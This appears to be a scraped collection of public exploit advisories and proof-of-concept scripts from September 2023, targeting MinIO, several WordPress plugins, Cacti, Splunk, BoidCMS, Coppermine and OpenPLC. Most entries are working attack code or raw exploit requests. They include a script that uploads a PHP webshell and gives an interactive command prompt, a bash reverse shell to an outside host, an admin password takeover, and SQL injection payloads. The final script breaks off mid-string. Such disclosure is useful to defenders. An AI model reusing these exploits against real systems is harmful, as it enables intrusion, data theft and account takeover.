ISHACK AI BOT

# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal # Date: 2023-09-02 # Exploit Author: Jenson Zhao # Vendor Homepage: https://min.io/ # Software Link: https://github.com/minio/minio/ # Version: Up to (excluding) 2022-07-29T19-40-48Z # Tested on: Windows 10 # CVE : CVE-2022-35919 # Required before execution: pip install minio,requests import urllib.parse import requests, json, re, datetime, argparse from minio.credentials import Credentials from minio.signer import sign_v4_s3 class MyMinio(): secure = False def __init__(self, base_url, access_key, secret_key): self.credits = Credentials( access_key=access_key, secret_key=secret_key ) if base_url.startswith('http://') and base_url.endswith('/'): self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' elif base_url.startswith('https://') and base_url.endswith('/'): self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' self.secure = True else: print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n') def poc(self): datetimes = datetime.datetime.utcnow() datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ') urls = urllib.parse.urlparse(self.url) headers = { 'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'X-Amz-Date': datetime_str, 'Host': urls.netloc, } headers = sign_v4_s3( method='POST', url=urls, region='', headers=headers, credentials=self.credits, content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', date=datetimes, ) if self.secure: response = requests.post(url=self.url, headers=headers, verify=False) else: response = requests.post(url=self.url, headers=headers) try: message = json.loads(response.text)['Message'] pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)' matches = re.findall(pattern, message) if matches: print('There is CVE-2022-35919 problem with the url!') print('The contents of the /etc/passwd file are as follows:') for match in matches: print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5], match[6])) else: print('There is no CVE-2022-35919 problem with the url!') print('Here is the response message content:') print(message) except Exception as e: print( 'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:') print(response.text) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/") parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") args = parser.parse_args() minio = MyMinio(args.url, args.accesskey, args.secretkey) minio.poc()

# Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation # Google Dork: inurl:/user-public-account # Date: 2023-09-04 # Exploit Author: Revan Arifio # Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/ # Version: <= 3.0.17 # Tested on: Windows, Linux # CVE : CVE-2023-4278 import requests import os import re import time banner = """ _______ ________ ___ ___ ___ ____ _ _ ___ ______ ___ / ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \ | | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) | | | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ < | |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) | \_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/ ====================================================================================================== || Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation || || Author : https://github.com/revan-ar || || Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ || || Support : https://www.buymeacoffee.com/revan.ar || ====================================================================================================== """ print(banner) # get nonce def get_nonce(target): open_target = requests.get("{}/user-public-account".format(target)) search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text) if search_nonce[1] != None: return search_nonce[1] else: print("Failed when getting Nonce :p") # privielege escalation def privesc(target, nonce, username, password, email): req_data = { "user_login":"{}".format(username), "user_email":"{}".format(email), "user_password":"{}".format(password), "user_password_re":"{}".format(password), "become_instructor":True, "privacy_policy":True, "degree":"", "expertize":"", "auditory":"", "additional":[], "additional_instructors":[], "profile_default_fields_for_register":[], "redirect_page":"{}/user-account/".format(target) } start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data) if start.status_code == 200: print("[+] Exploit Success !!") else: print("[+] Exploit Failed :p") # URL target target = input("[+] URL Target: ") print("[+] Starting Exploit") plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target)) plugin_version = re.search("Stable tag: (.+)", plugin_check.text) int_version = plugin_version[1].replace(".", "") time.sleep(1) if int(int_version) < 3018: print("[+] Target is Vulnerable !!") # Credential email = input("[+] Email: ") username = input("[+] Username: ") password = input("[+] Password: ") time.sleep(1) print("[+] Getting Nonce...") get_nonce = get_nonce(target) # Get Nonce if get_nonce != None: print("[+] Success Getting Nonce: {}".format(get_nonce)) time.sleep(1) # Start PrivEsc privesc(target, get_nonce, username, password, email) # ---------------------------------- else: print("[+] Target is NOT Vulnerable :p")

## Title: WEBIGniter v28.7.23 File Upload - Remote Code Execution ## Author: nu11secur1ty ## Date: 09/04/2023 ## Vendor: https://webigniter.net/ ## Software: https://webigniter.net/demo ## Reference: https://portswigger.net/web-security/file-upload ## Description: The media function suffers from file upload vulnerability. The attacker can upload and he can execute remotely very dangerous PHP files, by using any created account before this on this system. Then he can do very malicious stuff with the server of this application. ## Staus: HIGH-CRITICAL Vulnerability [+]Simple Exploit: ```PHP <?php phpinfo(); ?> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-File-Upload-RCE) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-file-upload-rce.html) ## Time spent: 00:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI # Date: 2023/09/05 # CVE: CVE-2023-4634 # Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh # Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ # Exploit: https://github.com/Patrowl/CVE-2023-4634/ # Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/ # Software Link: https://fr.wordpress.org/plugins/media-library-assistant/ # Version: < 3.10 # Tested on: 3.09 # Description: # Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php #LFI Steps to trigger conversion of a remote SVG Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references) Host 2 files : - malicious.svg - malicious.svg[1] Payload: For LFI, getting wp-config.php: Both malicious.svg and malicious.svg[1] on the remote FTP: <svg width="500" height="500" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href= "text:../../../../wp-config.php" width="500" height="500" /> </svg> Then trigger conversion with: http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1 # Directory listing or RCE: To achieve Directory listing or even RCE, it is a little more complicated. Use exploit available here: https://github.com/Patrowl/CVE-2023-4634/ # Note Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration).

Exploit Title: coppermine-gallery 1.6.25 RCE Application: coppermine-gallery Version: v1.6.25 Bugs: RCE Technology: PHP Vendor URL: https://coppermine-gallery.net/ Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip Date of found: 05.09.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip. $ cat >> test.php <?php echo system('cat /etc/passwd'); ?> $ zip test.zip test.php 1. Login to account 2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php 3. Upload zip file 4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php poc request POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1 Host: localhost Content-Length: 630 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c Connection: close ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="plugin"; filename="test.zip" Content-Type: application/zip PK �����b%Wz½µ}(���(�����test.phpUT �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?> PK �����b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j����� ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="form_token" 50982f2e64a7bfa63dbd912a7fdb4e1e ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="timestamp" 1693905214 ------WebKitFormBoundaryi1AopwPnBYPdzorF--

# Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS # Date: 2023-09-05 # Exploit Author: Furkan Karaarslan # Category : Webapps # Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php # Version: 4.7 (REQUIRED) # Tested on: Windows/Linux ---------------------------------------------------------------------------------------------------- 1-First install sonar music plugin. 2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist 3-Press the Add new playlist button 4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist 5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/ 6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script> Bingoo Request: POST /wp/wordpress/wp-comments-post.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 155 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/wp/wordpress/album_slug/test/ Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486 Connection: close comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5

# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options # Date: 2023-07-03 # Exploit Author: Antonio Francesco Sardella # Vendor Homepage: https://www.cacti.net/ # Software Link: https://www.cacti.net/info/downloads # Version: Cacti 1.2.24 # Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container # CVE: CVE-2023-39362 # Category: WebApps # Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp # Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application # Vulnerability discovered and reported by: Antonio Francesco Sardella ======================================================================================= Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362) ======================================================================================= ----------------- Executive Summary ----------------- In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. ------- Exploit ------- Prerequisites: - The attacker is authenticated. - The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs". - A Device that supports SNMP can be used. - Net-SNMP Graphs can be used. - snmp module of PHP is not installed. Example of an exploit: - Go to "Console" > "Create" > "New Device". - Create a Device that supports SNMP version 1 or 2. - Ensure that the Device has Graphs with one or more templates of: - "Net-SNMP - Combined SCSI Disk Bytes" - "Net-SNMP - Combined SCSI Disk I/O" - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite) - In the "SNMP Options", for the "SNMP Community String" field, use a value like this: public\' ; touch /tmp/m3ssap0 ; \' - Click the "Create" button. - Check under /tmp the presence of the created file. To obtain a reverse shell, a payload like the following can be used. public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \' A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host). ---------- Root Cause ---------- A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html). ---------- References ---------- - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

#!/usr/bin/python3 # Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability # Date: 08/21/2023 # Exploit Author: 1337kid # Vendor Homepage: https://boidcms.github.io/#/ # Software Link: https://boidcms.github.io/BoidCMS.zip # Version: <= 2.0.0 # Tested on: Ubuntu # CVE : CVE-2023-38836 import requests import re import argparse parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836') parser.add_argument("-u", "--url", help="website url") parser.add_argument("-l", "--user", help="admin username") parser.add_argument("-p", "--passwd", help="admin password") args = parser.parse_args() base_url=args.url user=args.user passwd=args.passwd def showhelp(): print(parser.print_help()) exit() if base_url == None: showhelp() elif user == None: showhelp() elif passwd == None: showhelp() with requests.Session() as s: req=s.get(f'{base_url}/admin') token=re.findall('[a-z0-9]{64}',req.text) form_login_data={ "username":user, "password":passwd, "login":"Login", } form_login_data['token']=token s.post(f'{base_url}/admin',data=form_login_data) #=========== File upload to RCE req=s.get(f'{base_url}/admin?page=media') token=re.findall('[a-z0-9]{64}',req.text) form_upld_data={ "token":token, "upload":"Upload" } #==== php shell php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>'] with open('shell.php','w') as f: f.writelines(php_code) #==== file = {'file' : open('shell.php','rb')} s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data) req=s.get(f'{base_url}/media/shell.php') if req.status_code == '404': print("Upload failed") exit() print(f'Shell uploaded to "{base_url}/media/shell.php"') while 1: cmd=input("cmd >> ") if cmd=='exit': exit() req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd}) print(req.text)

# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection # Google Dork: N/A # Date: 07/09/2023 # Exploit Author: Mohammed Adel # Vendor Homepage: https://www.atcom.cn/ # Software Link: https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html # Version: All versions above 2.7.x.x # Tested on: Kali Linux Exploit Request: POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1 Host: {TARGET_IP} User-Agent: polar Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Authorization: Digest username="admin", realm="IP Phone Web Configuration", nonce="value_here", uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", response="value_here", qop=auth, nc=value_here, cnonce="value_here" cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping Response: {"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"} The value of "ping_cmd_result" is encoded as base64. Decoding the value of "ping_cmd_result" reveals the result of the command executed as shown below: ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'

Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF Application: Webedition CMS Version: v2.9.8.8 Bugs: Blind SSRF Technology: PHP Vendor URL: https://www.webedition.org/ Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1 Date of found: 07.09.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== write https://youserver/test.xml to we_cmd[0] parameter poc request POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1 Host: localhost Content-Length: 141 sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300 Connection: close we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3

## Title: Limo Booking Software v1.0 - CORS ## Author: nu11secur1ty ## Date: 09/08/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/limo-booking-software/#sectionDemo ## Reference: https://portswigger.net/web-security/cors ## Description: The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain. The application allowed access from the requested origin http://wioydcbiourl.com Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks. The attacker can get some of the software resources of the victim without the victim knowing this. STATUS: HIGH Vulnerability [+]Test Payload: ``` GET /1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795 HTTP/1.1 Host: demo.phpjabbers.com Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36 Connection: close Cache-Control: max-age=0 Origin: http://wioydcbiourl.com Referer: http://demo.phpjabbers.com/ Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Limo-Booking-Software-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/09/limo-booking-software-10-cors.html) ## Time spent: 00:35:00

## Title: Shuttle-Booking-Software v1.0 - Multiple-SQLi ## Author: nu11secur1ty ## Date: 09/10/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The location_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the location_id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker easily can steal all information from the database of this web application! WARNING! All of you: Be careful what you buy! This will be your responsibility! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: location_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND 1347=1347 AND ('MVss'='MVss&traveling=from Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT (ELT(9416=9416,1))),0x71706b7071),9416) AND ('dOqc'='dOqc&traveling=from Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND ('EEYQ'='EEYQ&traveling=from --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html) ## Time spent: 01:47:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

#!/usr/bin/env python3 # # Exploit Title: Splunk 9.0.5 - admin account take over # Author: [Redway Security](https://twitter.com/redwaysec)) # Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99) #CVE: CVE-2023-32707 # Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned # to it can escalate their privileges to that of the admin user by providing specially crafted web requests. # # Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14. # import argparse import requests import random import string import base64 # ignore warnings import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Parse command-line arguments parser = argparse.ArgumentParser(description='Splunk Authentication') parser.add_argument('--host', required=True, help='Splunk host or IP address') parser.add_argument('--username', required=True, help='Splunk username') parser.add_argument('--password', required=True, help='Splunk password') parser.add_argument('--target-user', required=True, help='Target user') parser.add_argument('--force-exploit', action='store_true', help='Force exploit') args = parser.parse_args() # Splunk server settings splunk_host = args.host.split(':')[0] splunk_username = args.username splunk_password = args.password target_user = args.target_user force_exploit = args.force_exploit splunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089 user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users" credentials = f"{splunk_username}:{splunk_password}" base64_credentials = base64.b64encode(credentials.encode()).decode() headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0', 'Authorization': f'Basic {base64_credentials}' } proxies = { # 'http': '[http://127.0.0.1:8080'](<a href=),">http://127.0.0.1:8080', # 'https': 'http://127.0.0.1:8080' } response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json", headers=headers, proxies=proxies, verify=False) if response.status_code == 200: affected_versions = ['9.0.4', '8.2.10', '8.1.13'] user = response.json() splunk_version = user['generator']['version'] # This is not a good way to compare versions. # There is a range of versions that are affected by this CVE, but this is just a PoC # 8.1.0 to 8.1.13 # 8.2.0 to 8.2.10 # 9.0.0 to 9.0.4 print(f"Detected Splunk version '{splunk_version}'") if any(splunk_version <= value for value in affected_versions) or force_exploit: user_capabilities = user['entry'][0]['content']['capabilities'] if 'edit_user' in user_capabilities: print( f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.") new_password = ''.join(random.choice( string.ascii_letters + string.digits) for _ in range(8)) change_password_payload = { 'password': new_password, 'force-change-pass': 0, 'locked-out': 0 } response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json", data=change_password_payload, headers=headers, proxies=proxies, verify=False) if response.status_code == 200: print( f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'") else: print('Account takeover failed') else: print( f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.") else: print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707") else: print( f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'") exit(1)

# Exploit Title: OpenPLC WebServer 3 - Denial of Service # Date: 10.09.2023 # Exploit Author: Kai Feng # Vendor Homepage: https://autonomylogic.com/ # Software Link: https://github.com/thiagoralves/OpenPLC_v3.git # Version: Version 3 and 2 # Tested on: Ubuntu 20.04 import requests import sys import time import optparse import re parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)") parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login") parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login") parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection") parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection") options, args = parser.parse_args() if not options.url: print('[+] Remote Code Execution on OpenPLC_v3 WebServer') print('[+] Specify an url target') print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444") exit() host = options.url login = options.url + '/login' upload_program = options.url + '/programs' compile_program = options.url + '/compile-program?file=681871.st' run_plc_server = options.url + '/start_plc' user = options.user password = options.passw rev_ip = options.rip rev_port = options.rport x = requests.Session() def auth(): print('[+] Remote Code Execution on OpenPLC_v3 WebServer') time.sleep(1) print('[+] Checking if host '+host+' is Up...') host_up = x.get(host) try: if host_up.status_code == 200: print('[+] Host Up! ...') except: print('[+] This host seems to be down :( ') sys.exit(0) print('[+] Trying to authenticate with credentials '+user+':'+password+'') time.sleep(1) submit = { 'username': user, 'password': password } x.post(login, data=submit) response = x.get(upload_program) if len(response.text) > 30000 and response.status_code == 200: print('[+] Login success!') time.sleep(1) else: print('[x] Login failed :(') sys.exit(0) def injection(): print('[+] PLC program uploading... ') upload_url = host + "/upload-program" upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"} upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"} upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n VAR\n var_in : BOOL;\n var_out : BOOL;\n END_VAR\n\n var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n RESOURCE Res0 ON 